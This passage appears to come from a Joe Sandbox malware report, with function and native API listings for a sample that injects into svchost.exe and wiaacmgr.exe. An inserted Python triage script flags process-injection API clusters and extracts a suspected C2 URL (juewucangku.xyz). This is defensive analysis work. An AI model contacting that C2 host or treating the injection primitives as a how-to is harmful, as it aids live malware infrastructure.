Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_006A9810 NtDeleteFile
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_006A98B0 NtClose
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_006A9A20 NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe Code function: 0_2_0094D5EB: CreateFileW,DeviceIoControl,CloseHandle
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe Code function: 0_2_00941201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe Code function: 0_2_0094E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
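The URL strings near the top of this section and the native API lists above are the raw material an analyst works from when turning a report like this into detection content. As an added example (the author's own code, not part of Joe Sandbox or of this report), the Python script below parses lines in this report's "Source: ... Code function:" and "String found in binary or memory:" format, groups native API use per process, flags a process when its functions expose both a cross-process write primitive (NtWriteVirtualMemory, NtMapViewOfSection) and an execution primitive (NtQueueApcThread, NtSetContextThread, NtResumeThread), and separates the C2-shaped URL from the browser new-tab strings. The embedded input is a subset of lines copied from this report; the API groupings and the URL-shape heuristic are the author's assumptions, not Joe Sandbox signatures.

```python
"""Added example (author's own code, not part of Joe Sandbox or this report):
triage the 'Source:' lines of a Joe Sandbox report for injection-style native
API clusters and C2-shaped URLs."""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed input: a subset of lines copied from the report above. One line is
# left in the extraction-fused form ("...exeCode function: ...") on purpose.
SAMPLE_LINES = r"""
Source: wiaacmgr.exe, 00000006.00000002.3563181332.00000000078EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: wiaacmgr.exe, 00000006.00000002.3561555104.000000000553A000.00000004.10000000.00040000.00000000.sdmp, wdFhguqpcrad.exe, 00000007.00000002.3561058213.0000000003ADA000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: wiaacmgr.exe, 00000006.00000002.3561555104.00000000056CC000.00000004.10000000.00040000.00000000.sdmp, wdFhguqpcrad.exe, 00000007.00000002.3561058213.0000000003C6C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.juewucangku.xyz/b6bc/?3h=xoBYbUYuit1npWAzc9zxgzbhPQqmOl0jRZPyJ7i/hpkEutNt4jOTaw6JRAgW2lC
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe Code function: 0_2_0095ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_009520460_2_00952046
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03372CF0 NtOpenProcess
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03372E30 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03372EE0 NtQueueApcThread
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03374340 NtSetContextThread
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03372FB0 NtResumeThread
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_046E2D10 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_046E2EE0 NtQueueApcThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_046E4340 NtSetContextThread,LdrInitializeThunk
"""

# Joe's function tag is "<process index>_<run>_<8 hex digits>"; the HTML export
# appends a second copy of it after the API list, which the parser discards.
ADDR = r"\d+_\d+_[0-9A-F]{8}"
CODE_RE = re.compile(r"^Source: (?P<src>.+?)\s*Code function: (?P<addr>" + ADDR
                     + r"):?\s*(?P<apis>[A-Za-z0-9_,]*)$")
STR_RE = re.compile(r"^Source: (?P<src>.+?)\s*String found in binary or memory: (?P<value>\S.*)$")
EXE_RE = re.compile(r"[A-Za-z0-9_.-]+\.exe")

# Author's grouping of the native APIs seen in this report (assumption, not a
# Joe Sandbox signature): a process needs one of each to be flagged.
WRITE_APIS = {"NtWriteVirtualMemory", "NtMapViewOfSection"}
EXEC_APIS = {"NtQueueApcThread", "NtSetContextThread", "NtResumeThread"}

# Shape of the C2 URL in this report: a single four-character path segment
# followed by a short query key. Heuristic; it will also hit some benign URLs.
C2_PATH_RE = re.compile(r"^/[0-9a-z]{4}/$")


def parse_lines(text):
    """Turn report lines into dicts; lines of any other kind are ignored."""
    records = []
    for raw in text.splitlines():
        line = raw.strip()
        m = CODE_RE.match(line)
        if m:
            apis = [t for t in m["apis"].split(",") if t and not re.fullmatch(ADDR, t)]
            records.append({"kind": "code", "process": m["src"].rsplit("\\", 1)[-1],
                            "addr": m["addr"], "apis": apis})
            continue
        m = STR_RE.match(line)
        if m:
            records.append({"kind": "string", "processes": EXE_RE.findall(m["src"]),
                            "value": m["value"]})
    return records


def summarize(records):
    """Per-process function count and the set of Nt* APIs those functions call."""
    per_proc = defaultdict(lambda: {"functions": 0, "native_apis": set()})
    for r in records:
        if r["kind"] == "code":
            info = per_proc[r["process"]]
            info["functions"] += 1
            info["native_apis"].update(a for a in r["apis"] if a.startswith("Nt"))
    return dict(per_proc)


def flag_injection(summary):
    """Processes whose code shows both a foreign-memory write and a thread/APC execution primitive."""
    return {proc for proc, info in summary.items()
            if info["native_apis"] & WRITE_APIS and info["native_apis"] & EXEC_APIS}


def c2_candidates(records):
    """URLs from string hits that match the C2 shape described above."""
    hits = []
    for r in records:
        if r["kind"] != "string" or not r["value"].startswith("http"):
            continue
        parts = urlsplit(r["value"])
        key = parts.query.split("=", 1)[0] if "=" in parts.query else ""
        if C2_PATH_RE.match(parts.path) and 1 <= len(key) <= 4:
            hits.append(r["value"])
    return hits


def triage(text):
    records = parse_lines(text)
    summary = summarize(records)
    return {"processes": summary, "injection": flag_injection(summary),
            "c2_candidates": c2_candidates(records)}


if __name__ == "__main__":
    result = triage(SAMPLE_LINES)
    for proc, info in sorted(result["processes"].items()):
        tag = "INJECTION" if proc in result["injection"] else "-"
        print(f"{proc:18s} functions={info['functions']:2d} {tag:9s} {sorted(info['native_apis'])}")
    print("C2 candidates:", result["c2_candidates"])
```

On the copied subset, svchost.exe and wiaacmgr.exe are flagged (the processes the report's Yara hits and injection signatures point at) while the AutoIt stub 3HnH4uJtE7.exe, whose functions here are clipboard calls, is not; the only URL that survives the path check is the juewucangku.xyz string. The URL rule is a candidate filter to cross-check against the report's DNS and Suricata sections, not a verdict, and the LdrInitializeThunk tokens are passed through without interpretation.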
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe Code function: 0_2_00952046
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe Code function: 0_2_008E8060
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe Code function: 0_2_00948298
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe Code function: 0_2_0091E4FF
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe Code function: 0_2_0091676B
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe Code function: 0_2_00974873
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe Code function: 0_2_0090CAA0
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe Code function: 0_2_008ECAF0
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe Code function: 0_2_008FCC39
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe Code function: 0_2_00916DD9
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe Code function: 0_2_008E91C0
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe Code function: 0_2_008FB119
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe Code function: 0_2_00901394
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe Code function: 0_2_00901706
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe Code function: 0_2_0090781B
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe Code function: 0_2_009019B0
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe Code function: 0_2_008E7920
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe Code function: 0_2_008F997D
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe Code function: 0_2_00907A4A
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe Code function: 0_2_00907CA7
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe Code function: 0_2_00901C77
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe Code function: 0_2_00919EEE
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe Code function: 0_2_0096BE44
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe Code function: 0_2_00901F32
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe Code function: 0_2_00BE2DB8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00418A23
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00403010
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0042F173
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0041024A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00410253
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00401220
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00402B80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004043B5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00410473
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0040E473
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00416C10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00416C13
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004024D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0040E5C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0040E5B8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00402740
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033FA352
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034003E6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0334E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033C02C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03330100
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033C8158
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033F41A2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034001AA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033F81CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03364750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0333C7C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0335C6E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03340535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03400591
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033E4420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033F2446
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033EE4F6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033FAB40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033F6BD7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03356962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0340A9A6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0334A840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03342840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033268B8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0336E8F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03360F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033E2F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03382F28
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033B4F40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033BEFA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03332FC8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033FEE26
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03340E59
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03352E90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033FCE93
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033FEEDB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033DCD1F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0334AD00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03358DBF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0333ADE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03340C00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033E0CB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03330CF2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033F132D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0332D34C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0338739A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033452A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0335D2F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033E12ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0335B2C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0340B16B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0332F172
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0337516C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0334B1B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033F70E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033FF0E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033EF0CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033470C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033FF7B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03385630
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033F16CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034095C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033DD5B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033FF43F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03331460
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033FFB76
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0335FB80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033B5BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0337DBF9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033B3A6C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033FFA49
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033F7A46
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033DDAAC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03385AA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033E1AA3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033EDAC6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033D5910
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03349950
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0335B950
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033AD800
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033FFF09
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033FFFB1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03341F92
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03303FD2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03303FD5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03349EB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033F7D73
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033F1D5A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03343D40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0335FDC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033B9C32
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033FFCF2
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_04762446
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_04754420
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_0475E4F6
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_046B0535
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_046B850D
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_04770591
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_046CC6E0
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_046B0770
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_046D4750
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_046AC7C0
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_04742000
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_04738158
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_046A0100
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_0474A118
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_047681CC
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_047641A2
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_047701AA
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_04750274
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_047302C0
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_0476A352
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_047703E6
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_046BE3F0
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_046B0C00
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_046A0CF2
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_04750CB5
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_046BAD00
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_0474CD1F
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_046AADE0
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_046C8DBF
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_046B0E59
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_0476EE26
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_0476EEDB
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_0476CE93
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_046C2E90
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_04724F40
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_04752F30
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_046F2F28
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_046D0F30
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_046A2FC8
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_0472EFA0
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_046BA840
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046B28406_2_046B2840
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046DE8F06_2_046DE8F0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046968B86_2_046968B8
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046C69626_2_046C6962
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046B29A06_2_046B29A0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0477A9A66_2_0477A9A6
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046AEA806_2_046AEA80
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0476AB406_2_0476AB40
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_04766BD76_2_04766BD7
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046A14606_2_046A1460
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0476F43F6_2_0476F43F
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_047675716_2_04767571
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_047795C36_2_047795C3
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0474D5B06_2_0474D5B0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046F56306_2_046F5630
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_047616CC6_2_047616CC
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0476F7B06_2_0476F7B0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0476F0E06_2_0476F0E0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_047670E96_2_047670E9
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046B70C06_2_046B70C0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0475F0CC6_2_0475F0CC
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046E516C6_2_046E516C
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0469F1726_2_0469F172
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0477B16B6_2_0477B16B
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046BB1B06_2_046BB1B0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_047512ED6_2_047512ED
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046CD2F06_2_046CD2F0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046CB2C06_2_046CB2C0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046B52A06_2_046B52A0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0469D34C6_2_0469D34C
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0476132D6_2_0476132D
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046F739A6_2_046F739A
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_04729C326_2_04729C32
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0476FCF26_2_0476FCF2
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_04767D736_2_04767D73
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046B3D406_2_046B3D40
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_04761D5A6_2_04761D5A
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046CFDC06_2_046CFDC0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046B9EB06_2_046B9EB0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0476FF096_2_0476FF09
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_04673FD56_2_04673FD5
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_04673FD26_2_04673FD2
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0476FFB16_2_0476FFB1
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046B1F926_2_046B1F92
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0471D8006_2_0471D800
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046B38E06_2_046B38E0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046B99506_2_046B9950
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046CB9506_2_046CB950
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_047459106_2_04745910
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_04723A6C6_2_04723A6C
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_04767A466_2_04767A46
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0476FA496_2_0476FA49
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0475DAC66_2_0475DAC6
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046F5AA06_2_046F5AA0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_04751AA36_2_04751AA3
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0474DAAC6_2_0474DAAC
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0476FB766_2_0476FB76
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_04725BF06_2_04725BF0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046EDBF96_2_046EDBF9
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046CFB806_2_046CFB80
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_006920E06_2_006920E0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0068CFC06_2_0068CFC0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0068CFB76_2_0068CFB7
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_006811226_2_00681122
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0068B1E06_2_0068B1E0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0068D1E06_2_0068D1E0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0068B3256_2_0068B325
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0068B3306_2_0068B330
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_006957906_2_00695790
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0069397D6_2_0069397D
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_006939806_2_00693980
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_006ABEE06_2_006ABEE0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0456E76C6_2_0456E76C
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0456E2B56_2_0456E2B5
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0456E3D56_2_0456E3D5
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0456D8386_2_0456D838
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_0456CAD86_2_0456CAD8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0332B970 appears 262 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 033BF290 appears 103 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03375130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 033AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03387E54 appears 107 times
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: String function: 008FF9F2 appears 31 times
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: String function: 00900A30 appears 46 times
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: String function: 0471EA12 appears 86 times
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: String function: 046E5130 appears 58 times
